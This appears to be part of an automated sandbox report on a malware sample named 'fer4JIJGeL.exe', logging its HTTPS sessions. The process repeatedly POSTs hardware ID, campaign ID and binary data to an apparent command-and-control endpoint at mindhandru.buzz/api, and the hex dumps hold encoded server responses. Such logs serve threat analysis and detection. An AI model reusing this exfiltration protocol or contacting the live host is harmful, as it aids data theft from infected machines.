                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Pyq%2F6YJOSLJB%2BjpkM2QK8JPiG%2B58fjuzj0%2BiPM6ujwgLnh3FbqC0AWu806ntYb6L3ghrsbapJHhpn%2Fu%2FwzLg14emkiRJXhEjv02Uo8ZkJAElWphvxUgUB%2BJstzelZNwbsU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f87c6b369c7c32e-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1470&min_rtt=1466&rtt_var=559&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=946&delivery_rate=1941489&cwnd=178&unsent_bytes=0&cid=94d842f5b4f85ed0&ts=996&x=0"
                                                                                                              2024-12-27 08:00:19 UTC238INData Raw: 34 39 31 63 0d 0a 6f 4b 4a 6e 4d 38 2b 45 62 4d 6c 70 47 49 49 77 50 64 41 56 30 71 38 31 71 41 76 6f 70 63 73 46 38 41 55 41 6d 7a 54 68 48 6c 33 62 67 42 45 52 39 62 42 41 36 78 70 39 6f 41 70 4a 6f 6d 43 33 67 78 66 4a 62 38 71 66 72 57 53 63 64 6d 57 33 46 70 64 7a 66 35 72 45 42 6c 2b 38 34 55 44 72 44 47 43 67 43 6d 61 72 4e 37 66 42 46 35 49 70 6a 63 2b 70 5a 4a 78 6e 59 66 42 62 6b 58 49 2b 79 4d 34 41 57 36 72 6e 43 4b 67 46 64 65 64 56 57 4c 46 2f 76 4d 5a 59 77 47 62 4b 69 65 6c 67 69 69 63 36 75 58 6d 45 61 6a 7a 74 77 78 52 59 37 66 6c 41 73 6b 74 39 37 42 49 48 38 6e 53 33 7a 56 6e 4f 62 34 50 4e 6f 32 32 55 5a 6d 54 78 52 49 68 34 4e 63 6a 41 41 31 71 67 37 68 79 6c 44 33 4c 73 55 31 4b 78
                                                                                                              Data Ascii: 491coKJnM8+EbMlpGIIwPdAV0q81qAvopcsF8AUAmzThHl3bgBER9bBA6xp9oApJomC3gxfJb8qfrWScdmW3Fpdzf5rEBl+84UDrDGCgCmarN7fBF5Ipjc+pZJxnYfBbkXI+yM4AW6rnCKgFdedVWLF/vMZYwGbKielgiic6uXmEajztwxRY7flAskt97BIH8nS3zVnOb4PNo22UZmTxRIh4NcjAA1qg7hylD3LsU1Kx
                                                                                                              2024-12-27 08:00:19 UTC1369INData Raw: 4e 2f 36 4e 55 4e 49 70 30 6f 66 36 56 5a 46 32 63 2b 78 62 6b 33 70 2f 33 59 34 63 45 61 72 71 54 76 4e 4c 63 75 78 63 57 72 46 34 74 38 78 58 32 47 61 4b 78 4b 46 76 6c 6d 31 74 39 6c 6d 4e 64 6a 6a 4b 79 51 4a 65 71 75 34 49 70 41 67 36 72 68 4a 59 71 6a 66 6f 6a 58 66 61 61 6f 6e 54 70 48 62 53 65 43 7a 67 46 6f 52 77 66 35 71 41 41 31 2b 73 36 77 36 35 41 33 48 72 56 30 32 35 66 72 33 41 56 38 64 6a 68 63 53 70 59 4a 68 74 62 66 4e 53 6a 6e 45 35 77 73 42 46 48 2b 33 68 46 75 74 54 4f 73 4e 58 54 37 56 37 70 6f 39 74 69 6e 62 45 33 75 6c 67 6e 69 63 36 75 56 36 47 66 7a 7a 4a 7a 77 5a 5a 70 76 51 4f 75 51 31 33 35 55 42 5a 74 33 6d 36 7a 6b 58 41 5a 34 7a 45 6f 47 79 62 59 6d 58 39 46 73 30 38 4f 4e 71 41 58 52 47 4d 36 77 57 6e 41 57 33 67 45 6b 44
                                                                                                              Data Ascii: N/6NUNIp0of6VZF2c+xbk3p/3Y4cEarqTvNLcuxcWrF4t8xX2GaKxKFvlm1t9lmNdjjKyQJequ4IpAg6rhJYqjfojXfaaonTpHbSeCzgFoRwf5qAA1+s6w65A3HrV025fr3AV8djhcSpYJhtbfNSjnE5wsBFH+3hFutTOsNXT7V7po9tinbE3ulgnic6uV6GfzzJzwZZpvQOuQ135UBZt3m6zkXAZ4zEoGybYmX9Fs08ONqAXRGM6wWnAW3gEkD
                                                                                                              2024-12-27 08:00:19 UTC1369INData Raw: 55 58 47 59 34 7a 49 70 47 76 53 4b 53 4c 2b 54 73 4d 6b 66 2b 6a 44 45 56 4b 6e 70 44 75 6f 42 58 54 6e 52 42 2b 74 4f 61 6d 4e 55 4d 59 70 30 6f 65 6b 5a 70 70 68 63 50 5a 62 67 48 49 78 7a 63 55 4b 57 61 33 6d 41 36 34 50 63 65 74 52 55 72 5a 6c 75 73 31 66 7a 32 69 41 7a 65 6b 70 30 6d 42 36 75 51 37 44 54 53 6a 4a 67 6a 42 53 6f 2b 67 4a 76 55 74 6c 72 6b 73 66 74 58 76 77 6c 52 66 48 59 59 2f 43 70 6d 61 59 61 57 66 7a 57 6f 74 79 50 4e 44 50 41 56 47 68 37 67 53 6d 42 58 37 6f 57 31 53 35 63 62 44 4d 58 59 6f 6e 79 73 43 78 4a 38 6f 6e 56 76 35 61 6a 6e 4e 39 39 38 4d 4c 58 36 72 77 54 72 52 46 59 36 42 56 55 2f 49 76 38 4d 46 65 79 6d 4b 41 77 36 6c 67 6e 32 4a 68 2f 6c 57 4f 65 7a 58 4d 78 77 46 64 70 4f 73 49 71 77 78 2b 35 55 42 61 75 33 75 38
                                                                                                              Data Ascii: UXGY4zIpGvSKSL+TsMkf+jDEVKnpDuoBXTnRB+tOamNUMYp0oekZpphcPZbgHIxzcUKWa3mA64PcetRUrZlus1fz2iAzekp0mB6uQ7DTSjJgjBSo+gJvUtlrksftXvwlRfHYY/CpmaYaWfzWotyPNDPAVGh7gSmBX7oW1S5cbDMXYonysCxJ8onVv5ajnN998MLX6rwTrRFY6BVU/Iv8MFeymKAw6lgn2Jh/lWOezXMxwFdpOsIqwx+5UBau3u8
                                                                                                              2024-12-27 08:00:19 UTC1369INData Raw: 2f 4b 32 4f 64 2b 30 6d 42 75 75 51 37 44 64 54 62 51 7a 67 74 59 6f 4f 41 47 72 41 56 33 36 31 52 55 74 58 43 32 77 46 2f 48 62 49 6e 47 72 57 32 41 5a 47 6e 7a 57 34 6b 38 63 59 4c 48 48 52 48 31 70 69 6d 6e 49 6d 72 37 51 45 6e 79 61 50 37 55 46 38 31 6c 79 70 2f 70 5a 4a 31 75 62 66 46 65 6a 48 4d 37 7a 4d 59 44 58 4b 6a 70 42 4c 6b 44 64 4f 31 5a 55 4c 6c 6c 73 4d 42 54 78 6d 32 43 7a 4b 4d 6e 33 43 64 6c 34 52 62 62 50 41 72 50 7a 77 56 53 75 36 59 52 35 52 49 36 35 31 34 66 36 6a 65 38 77 31 66 46 5a 59 62 4d 6f 57 61 65 61 57 58 38 58 34 74 30 4c 63 50 45 44 56 43 6a 36 51 2b 76 44 6e 2f 6b 56 56 75 30 65 50 43 44 46 38 31 78 79 70 2f 70 53 4c 56 53 49 4e 68 73 77 32 4e 78 32 34 41 43 58 65 32 2b 54 71 63 49 64 75 68 64 57 62 74 37 75 73 52 63 78
                                                                                                              Data Ascii: /K2Od+0mBuuQ7DdTbQzgtYoOAGrAV361RUtXC2wF/HbInGrW2AZGnzW4k8cYLHHRH1pimnImr7QEnyaP7UF81lyp/pZJ1ubfFejHM7zMYDXKjpBLkDdO1ZULllsMBTxm2CzKMn3Cdl4RbbPArPzwVSu6YR5RI6514f6je8w1fFZYbMoWaeaWX8X4t0LcPEDVCj6Q+vDn/kVVu0ePCDF81xyp/pSLVSINhsw2Nx24ACXe2+TqcIduhdWbt7usRcx
                                                                                                              2024-12-27 08:00:19 UTC1369INData Raw: 71 59 35 64 6f 59 2f 68 51 6b 58 73 32 30 4d 34 49 58 71 58 75 42 36 6f 50 66 2b 31 55 55 37 68 32 74 38 4e 5a 77 69 6e 45 68 36 35 2f 30 6a 38 69 32 45 61 59 62 69 6e 50 34 51 68 65 37 66 6c 41 73 6b 74 39 37 42 49 48 38 6e 36 69 79 56 72 59 59 49 33 4a 70 6d 53 41 5a 6d 2f 79 52 49 52 7a 4f 38 58 4d 41 31 36 72 35 77 75 68 42 33 33 6c 57 56 43 2b 4e 2f 36 4e 55 4e 49 70 30 6f 65 48 62 49 46 77 59 66 64 64 6c 57 64 2f 33 59 34 63 45 61 72 71 54 76 4e 4c 65 65 74 5a 57 37 4a 37 73 4d 6c 61 79 6e 75 46 77 4b 35 75 6d 58 56 6f 2f 6c 47 49 64 44 54 4e 78 68 64 64 6f 2f 51 4c 75 52 6b 36 72 68 4a 59 71 6a 66 6f 6a 57 48 4e 65 5a 72 45 36 31 61 45 5a 48 54 79 57 34 38 38 49 49 7a 5a 52 56 61 68 70 6c 62 72 44 58 58 70 55 56 43 7a 66 72 7a 41 55 73 4e 73 69 38
                                                                                                              Data Ascii: qY5doY/hQkXs20M4IXqXuB6oPf+1UU7h2t8NZwinEh65/0j8i2EaYbinP4Qhe7flAskt97BIH8n6iyVrYYI3JpmSAZm/yRIRzO8XMA16r5wuhB33lWVC+N/6NUNIp0oeHbIFwYfddlWd/3Y4cEarqTvNLeetZW7J7sMlaynuFwK5umXVo/lGIdDTNxhddo/QLuRk6rhJYqjfojWHNeZrE61aEZHTyW488IIzZRVahplbrDXXpUVCzfrzAUsNsi8
                                                                                                              2024-12-27 08:00:19 UTC1369INData Raw: 56 57 48 69 46 70 77 79 4a 6f 4c 48 43 52 48 31 70 67 32 73 43 48 76 71 57 31 4f 39 63 4c 54 66 58 63 31 37 69 38 61 69 61 70 35 6e 62 2f 52 63 67 6e 55 79 7a 73 30 43 56 71 4c 6a 54 75 56 4c 66 66 67 53 42 2f 4a 57 76 63 5a 62 6b 54 50 4b 32 4f 64 2b 30 6d 42 75 75 51 37 44 66 44 58 48 79 67 68 53 6f 75 55 63 71 67 31 6f 34 46 39 56 6f 48 32 37 79 46 72 48 5a 49 6e 42 72 32 79 65 64 57 76 35 56 59 67 38 63 59 4c 48 48 52 48 31 70 69 32 38 48 58 44 6e 58 6b 6d 35 64 72 50 62 57 74 6f 70 78 49 65 34 59 49 4d 6e 4f 75 39 47 6c 48 73 67 6a 4e 6c 46 56 71 47 6d 56 75 73 4e 63 2b 5a 56 57 62 78 6c 74 63 74 59 78 57 43 44 77 36 46 6b 6b 6d 4e 6d 2f 6c 4f 41 63 44 54 46 77 77 70 56 70 4f 67 48 70 45 73 30 6f 46 56 48 38 69 2f 77 37 45 7a 4a 5a 59 65 48 74 69 6d
                                                                                                              Data Ascii: VWHiFpwyJoLHCRH1pg2sCHvqW1O9cLTfXc17i8aiap5nb/RcgnUyzs0CVqLjTuVLffgSB/JWvcZbkTPK2Od+0mBuuQ7DfDXHyghSouUcqg1o4F9VoH27yFrHZInBr2yedWv5VYg8cYLHHRH1pi28HXDnXkm5drPbWtopxIe4YIMnOu9GlHsgjNlFVqGmVusNc+ZVWbxltctYxWCDw6FkkmNm/lOAcDTFwwpVpOgHpEs0oFVH8i/w7EzJZYeHtim
                                                                                                              2024-12-27 08:00:19 UTC1369INData Raw: 78 61 45 5a 48 2b 61 67 43 56 61 75 2b 4d 4a 76 55 6c 50 34 31 78 52 74 57 48 77 30 6d 69 45 4b 59 58 64 36 54 2b 72 66 69 4c 2b 57 73 4d 6b 66 39 66 48 42 56 61 33 38 41 6d 6e 47 6e 48 74 58 6e 32 39 63 4b 62 4f 57 4d 6c 34 67 34 75 69 61 74 49 70 49 76 35 4f 77 79 52 2f 37 63 63 54 55 6f 4c 6c 48 36 4a 4c 4e 4b 42 56 53 66 49 76 38 50 4d 58 32 47 71 61 78 4b 5a 32 72 43 63 36 34 47 6a 44 64 79 6e 46 30 41 5a 48 70 75 73 43 75 6a 55 36 75 41 59 4e 34 43 58 69 6e 30 69 4b 64 72 57 4a 36 57 62 53 50 31 76 67 46 70 55 38 5a 35 43 4f 52 55 50 74 76 6b 37 73 43 47 6a 79 56 46 79 6b 64 50 66 7a 61 65 31 2f 67 4d 43 35 59 49 56 6f 49 72 63 57 6a 44 78 6e 2b 34 41 4d 56 72 62 33 47 4b 59 62 66 61 42 74 45 66 4a 76 38 4a 55 58 2f 32 71 45 79 61 35 78 67 79 70 46
                                                                                                              Data Ascii: xaEZH+agCVau+MJvUlP41xRtWHw0miEKYXd6T+rfiL+WsMkf9fHBVa38AmnGnHtXn29cKbOWMl4g4uiatIpIv5OwyR/7ccTUoLlH6JLNKBVSfIv8PMX2GqaxKZ2rCc64GjDdynF0AZHpusCujU6uAYN4CXin0iKdrWJ6WbSP1vgFpU8Z5CORUPtvk7sCGjyVFykdPfzae1/gMC5YIVoIrcWjDxn+4AMVrb3GKYbfaBtEfJv8JUX/2qEya5xgypF
                                                                                                              2024-12-27 08:00:19 UTC1369INData Raw: 73 42 2f 4d 45 49 58 75 48 6f 42 61 73 4d 61 76 5a 4a 45 37 70 30 71 74 64 70 39 45 4b 47 77 61 35 39 6c 57 46 45 32 52 62 4e 50 44 43 43 6d 44 77 52 35 61 59 78 35 55 74 69 6f 41 6f 66 68 33 53 2b 77 31 44 63 65 4d 66 76 69 6c 32 6f 4a 55 37 2b 51 38 46 49 4f 4e 4c 52 44 6c 79 68 70 6b 44 72 44 54 71 34 41 68 48 79 63 36 47 4e 44 35 6f 37 30 5a 4c 36 4d 4d 49 31 66 62 64 50 77 32 70 2f 6d 70 4a 4c 45 62 2b 6d 56 75 74 4d 65 66 4a 41 57 62 46 68 73 34 70 70 39 45 36 45 77 4b 68 78 67 6e 42 74 78 32 69 57 66 7a 48 4d 78 78 4e 41 37 61 68 4f 70 45 73 69 32 52 49 58 38 6b 6a 2b 6a 55 2b 4b 4d 63 72 79 71 6d 6d 63 59 48 54 6f 47 36 52 79 4f 4d 50 57 46 55 61 69 70 6b 44 72 44 54 71 34 41 42 48 79 63 36 47 4e 44 35 6f 37 30 5a 4c 36 4d 4d 49 31 66 62 64 50 77
                                                                                                              Data Ascii: sB/MEIXuHoBasMavZJE7p0qtdp9EKGwa59lWFE2RbNPDCCmDwR5aYx5UtioAofh3S+w1DceMfvil2oJU7+Q8FIONLRDlyhpkDrDTq4AhHyc6GND5o70ZL6MMI1fbdPw2p/mpJLEb+mVutMefJAWbFhs4pp9E6EwKhxgnBtx2iWfzHMxxNA7ahOpEsi2RIX8kj+jU+KMcryqmmcYHToG6RyOMPWFUaipkDrDTq4ABHyc6GND5o70ZL6MMI1fbdPw
                                                                                                              2024-12-27 08:00:19 UTC1369INData Raw: 4b 46 56 79 69 34 55 79 4c 44 47 7a 6a 45 68 48 79 65 2f 43 56 46 38 74 6a 6d 73 71 6d 59 4e 35 67 65 50 34 57 7a 54 77 78 67 70 68 46 55 4b 66 32 41 36 51 4d 4e 75 5a 63 55 66 4a 6f 2f 74 51 58 33 43 6e 53 6c 4f 63 6e 67 43 63 36 75 52 47 41 62 69 33 45 77 78 4e 53 36 74 67 77 68 68 6c 39 38 46 45 64 67 33 71 30 32 30 4c 4a 65 59 33 35 6c 30 71 41 59 48 4c 36 46 4c 4a 71 50 4d 4c 4f 41 68 48 6a 70 68 62 72 55 7a 72 4e 51 46 69 69 64 50 43 44 46 38 59 70 30 6f 65 6b 64 5a 56 33 59 62 56 52 6d 58 74 2f 33 59 34 63 45 62 75 6d 56 76 68 46 4f 76 49 53 42 2f 49 77 76 73 42 57 79 57 65 4a 31 62 74 68 6b 58 46 68 76 6d 69 39 55 53 33 46 30 41 59 54 6e 4f 73 4b 76 52 35 35 38 46 56 68 6a 46 71 69 79 6b 66 4a 4b 36 62 41 70 47 75 73 57 56 58 6f 55 5a 4d 2b 47 63
                                                                                                              Data Ascii: KFVyi4UyLDGzjEhHye/CVF8tjmsqmYN5geP4WzTwxgphFUKf2A6QMNuZcUfJo/tQX3CnSlOcngCc6uRGAbi3EwxNS6tgwhhl98FEdg3q020LJeY35l0qAYHL6FLJqPMLOAhHjphbrUzrNQFiidPCDF8Yp0oekdZV3YbVRmXt/3Y4cEbumVvhFOvISB/IwvsBWyWeJ1bthkXFhvmi9US3F0AYTnOsKvR558FVhjFqiykfJK6bApGusWVXoUZM+Gc


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.849707172.67.165.1854437656C:\Users\user\Desktop\fer4JIJGeL.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-27 08:00:20 UTC272OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=AVT6GUCXU
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 12792
                                                                                                              Host: mindhandru.buzz
                                                                                                              2024-12-27 08:00:20 UTC12792OUTData Raw: 2d 2d 41 56 54 36 47 55 43 58 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 37 35 30 36 45 42 36 34 31 42 44 37 36 46 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 41 56 54 36 47 55 43 58 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 41 56 54 36 47 55 43 58 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 41 56 54 36 47 55 43 58 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70
                                                                                                              Data Ascii: --AVT6GUCXUContent-Disposition: form-data; name="hwid"17506EB641BD76F1BEBA0C6A975F1733--AVT6GUCXUContent-Disposition: form-data; name="pid"2--AVT6GUCXUContent-Disposition: form-data; name="lid"PsFKDg--pablo--AVT6GUCXUContent-Disp
                                                                                                              2024-12-27 08:00:21 UTC1125INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 27 Dec 2024 08:00:21 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=gmv4qness0bvrcsrg79j7gvh91; expires=Tue, 22 Apr 2025 01:47:00 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0v46t7BALk%2BsGbQz0LzhO0FAMFMWhS5EqkuvAEhQx6dL8yxyO2CUVKL1rc%2F335U9bBv0zDoPVj7kuEYeLngILPw9FNLlDl9SsVSS6i0CCv2Uunxff76kgmt8jb1aT9zq0og%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f87c6c34c731a13-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1944&min_rtt=1832&rtt_var=767&sent=13&recv=17&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13722&delivery_rate=1593886&cwnd=169&unsent_bytes=0&cid=e24c35a4ff7dcf72&ts=898&x=0"
                                                                                                              2024-12-27 08:00:21 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2024-12-27 08:00:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.849708172.67.165.1854437656C:\Users\user\Desktop\fer4JIJGeL.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-27 08:00:23 UTC271OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=3PQAHZZ6
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 15015
                                                                                                              Host: mindhandru.buzz
                                                                                                              2024-12-27 08:00:23 UTC15015OUTData Raw: 2d 2d 33 50 51 41 48 5a 5a 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 37 35 30 36 45 42 36 34 31 42 44 37 36 46 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 33 50 51 41 48 5a 5a 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 50 51 41 48 5a 5a 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 33 50 51 41 48 5a 5a 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74
                                                                                                              Data Ascii: --3PQAHZZ6Content-Disposition: form-data; name="hwid"17506EB641BD76F1BEBA0C6A975F1733--3PQAHZZ6Content-Disposition: form-data; name="pid"2--3PQAHZZ6Content-Disposition: form-data; name="lid"PsFKDg--pablo--3PQAHZZ6Content-Disposit
                                                                                                              2024-12-27 08:00:23 UTC1126INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 27 Dec 2024 08:00:23 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=8t9dm630aa4m6kcsb4kdtm0vvm; expires=Tue, 22 Apr 2025 01:47:02 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q5ercTzvA3TLZQxUxMITLu3zOjlbJ%2B7bDciAExiYwjV9R1bfL0muL9fnLO3gQm8%2FSKHFyNfWQwTIjc4MyjnfhTLmfTAt6lgZCnfwBdGJ0ZTu%2FSuiG1QeuGOsZYvih9zjycQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f87c6d13dd37271-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1812&min_rtt=1810&rtt_var=684&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2838&recv_bytes=15944&delivery_rate=1594756&cwnd=225&unsent_bytes=0&cid=c5ea1662ed74f33c&ts=822&x=0"
                                                                                                              2024-12-27 08:00:23 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2024-12-27 08:00:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.849709172.67.165.1854437656C:\Users\user\Desktop\fer4JIJGeL.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-27 08:00:25 UTC282OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=5T8PG350TZ5RDHECV6F
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 20248
                                                                                                              Host: mindhandru.buzz
                                                                                                              2024-12-27 08:00:25 UTC15331OUTData Raw: 2d 2d 35 54 38 50 47 33 35 30 54 5a 35 52 44 48 45 43 56 36 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 37 35 30 36 45 42 36 34 31 42 44 37 36 46 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 35 54 38 50 47 33 35 30 54 5a 35 52 44 48 45 43 56 36 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 35 54 38 50 47 33 35 30 54 5a 35 52 44 48 45 43 56 36 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61
                                                                                                              Data Ascii: --5T8PG350TZ5RDHECV6FContent-Disposition: form-data; name="hwid"17506EB641BD76F1BEBA0C6A975F1733--5T8PG350TZ5RDHECV6FContent-Disposition: form-data; name="pid"3--5T8PG350TZ5RDHECV6FContent-Disposition: form-data; name="lid"PsFKDg--pa
                                                                                                              2024-12-27 08:00:25 UTC4917OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 23 d1 61 a9 ef 87 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0
                                                                                                              Data Ascii: s#a>7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8
                                                                                                              2024-12-27 08:00:26 UTC1135INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 27 Dec 2024 08:00:26 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=1pb5ccmrvqi8eqd3p23mc74vko; expires=Tue, 22 Apr 2025 01:47:05 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
